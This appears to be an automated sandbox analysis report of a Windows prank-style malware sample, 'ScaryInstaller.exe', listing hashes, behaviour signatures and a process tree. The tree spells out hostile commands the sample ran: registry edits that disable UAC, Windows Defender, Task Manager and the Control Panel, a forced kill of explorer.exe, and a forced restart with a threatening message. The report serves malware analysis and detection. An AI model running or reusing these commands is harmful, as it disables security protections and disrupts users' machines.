Analysis
-
max time kernel
32s -
max time network
34s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-04-2024 09:41
Behavioral task
behavioral1
Sample
ScaryInstaller.exe
Resource
win11-20240419-en
Errors
General
-
Target
ScaryInstaller.exe
-
Size
21.5MB
-
MD5
ac9526ec75362b14410cf9a29806eff4
-
SHA1
ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
-
SHA256
5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
-
SHA512
29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621
-
SSDEEP
393216:8c68zOv/h4ZPW+Fsx5QiaamSf8iqTCqcvgQYp6veX0N/9FRI9qo6xE:8j1hY++ViaamEhF5vvY2/VI9qK
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 2 IoCs
Processes:
CreepScreen.exemelter.exepid process 4416 CreepScreen.exe 2460 melter.exe -
Processes:
resource yara_rule behavioral1/memory/3456-0-0x0000000000400000-0x0000000001DFD000-memory.dmp upx behavioral1/memory/3456-23-0x0000000000400000-0x0000000001DFD000-memory.dmp upx behavioral1/memory/3456-40-0x0000000000400000-0x0000000001DFD000-memory.dmp upx -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1180 timeout.exe 5060 timeout.exe 1204 timeout.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1952 taskkill.exe 1276 taskkill.exe 1652 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "78" LogonUI.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 1880 vlc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
vlc.exepid process 1880 vlc.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exeAUDIODG.EXEvlc.exeshutdown.exedescription pid process Token: SeDebugPrivilege 1652 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1276 taskkill.exe Token: 33 1052 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1052 AUDIODG.EXE Token: 33 1880 vlc.exe Token: SeIncBasePriorityPrivilege 1880 vlc.exe Token: SeShutdownPrivilege 252 shutdown.exe Token: SeRemoteShutdownPrivilege 252 shutdown.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
Processes:
vlc.exepid process 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
CreepScreen.exevlc.exePickerHost.exeLogonUI.exepid process 4416 CreepScreen.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 1880 vlc.exe 3164 PickerHost.exe 4664 LogonUI.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
ScaryInstaller.execmd.exenet.exedescription pid process target process PID 3456 wrote to memory of 3560 3456 ScaryInstaller.exe cmd.exe PID 3456 wrote to memory of 3560 3456 ScaryInstaller.exe cmd.exe PID 3456 wrote to memory of 3560 3456 ScaryInstaller.exe cmd.exe PID 3560 wrote to memory of 1652 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1652 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1652 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 4416 3560 cmd.exe CreepScreen.exe PID 3560 wrote to memory of 4416 3560 cmd.exe CreepScreen.exe PID 3560 wrote to memory of 4416 3560 cmd.exe CreepScreen.exe PID 3560 wrote to memory of 1180 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 1180 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 1180 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 2460 3560 cmd.exe melter.exe PID 3560 wrote to memory of 2460 3560 cmd.exe melter.exe PID 3560 wrote to memory of 2460 3560 cmd.exe melter.exe PID 3560 wrote to memory of 5060 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 5060 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 5060 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 1952 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1952 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1952 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1276 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1276 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1276 3560 cmd.exe taskkill.exe PID 3560 wrote to memory of 1880 3560 cmd.exe vlc.exe PID 3560 wrote to memory of 1880 3560 cmd.exe vlc.exe PID 3560 wrote to memory of 3792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 3792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 3792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 4624 3560 cmd.exe rundll32.exe PID 3560 wrote to memory of 4624 3560 cmd.exe rundll32.exe PID 3560 wrote to memory of 4624 3560 cmd.exe rundll32.exe PID 3560 wrote to memory of 1792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 1792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 1792 3560 cmd.exe reg.exe PID 3560 wrote to memory of 224 3560 cmd.exe reg.exe PID 3560 wrote to memory of 224 3560 cmd.exe reg.exe PID 3560 wrote to memory of 224 3560 cmd.exe reg.exe PID 3560 wrote to memory of 1136 3560 cmd.exe reg.exe PID 3560 wrote to memory of 1136 3560 cmd.exe reg.exe PID 3560 wrote to memory of 1136 3560 cmd.exe reg.exe PID 3560 wrote to memory of 5000 3560 cmd.exe reg.exe PID 3560 wrote to memory of 5000 3560 cmd.exe reg.exe PID 3560 wrote to memory of 5000 3560 cmd.exe reg.exe PID 3560 wrote to memory of 4900 3560 cmd.exe reg.exe PID 3560 wrote to memory of 4900 3560 cmd.exe reg.exe PID 3560 wrote to memory of 4900 3560 cmd.exe reg.exe PID 3560 wrote to memory of 4812 3560 cmd.exe net.exe PID 3560 wrote to memory of 4812 3560 cmd.exe net.exe PID 3560 wrote to memory of 4812 3560 cmd.exe net.exe PID 4812 wrote to memory of 4084 4812 net.exe net1.exe PID 4812 wrote to memory of 4084 4812 net.exe net1.exe PID 4812 wrote to memory of 4084 4812 net.exe net1.exe PID 3560 wrote to memory of 1204 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 1204 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 1204 3560 cmd.exe timeout.exe PID 3560 wrote to memory of 252 3560 cmd.exe shutdown.exe PID 3560 wrote to memory of 252 3560 cmd.exe shutdown.exe PID 3560 wrote to memory of 252 3560 cmd.exe shutdown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe"C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68EB.tmp\creep.cmd" "2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\CreepScreen.exeCreepScreen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4416 -
C:\Windows\SysWOW64\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\melter.exemelter.exe3⤵
- Executes dropped EXE
PID:2460 -
C:\Windows\SysWOW64\timeout.exetimeout 10 /nobreak3⤵
- Delays execution with timeout.exe
PID:5060 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CreepScreen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im melter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\68EB.tmp\scarr.mp4"3⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1880 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f3⤵
- Sets desktop wallpaper using registry
PID:3792 -
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4624
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1792 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:224 -
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1136
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:5000 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f3⤵PID:4900
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"IT'S TOO LATE!!!"3⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"4⤵PID:4084
-
C:\Windows\SysWOW64\timeout.exetimeout 8 /nobreak3⤵
- Delays execution with timeout.exe
PID:1204 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:252
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3164
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a29055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
128KB
MD54ab112b494b6c6762afb1be97cdc19f5
SHA1eed9d960f86fb10da90d0bbca801aea021658f02
SHA256ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e
SHA5124f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49
-
Filesize
5.9MB
MD5463e7914d89b7dd1bfbba5b89c57eace
SHA17f697f8880bcf0beed430d80487dd58b975073fa
SHA256fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d
SHA512a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562
-
Filesize
1KB
MD5e77d2ff29ca99c3902d43b447c4039e2
SHA12805268a8db128a7278239d82402c9db0a06e481
SHA2561afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c
-
Filesize
2KB
MD533b75bd8dbb430e95c70d0265eeb911f
SHA15e92b23a16bef33a1a0bf6c1a7ee332d04ceab83
SHA2562f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12
SHA512943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936
-
Filesize
548KB
MD5c1978e4080d1ec7e2edf49d6c9710045
SHA1b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA5122de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e
-
Filesize
19.0MB
MD5a504846de42aa7e7b75541fa38987229
SHA14c8ba5768db2412d57071071f8573b83ecab0e2d
SHA256a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89
SHA51228b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea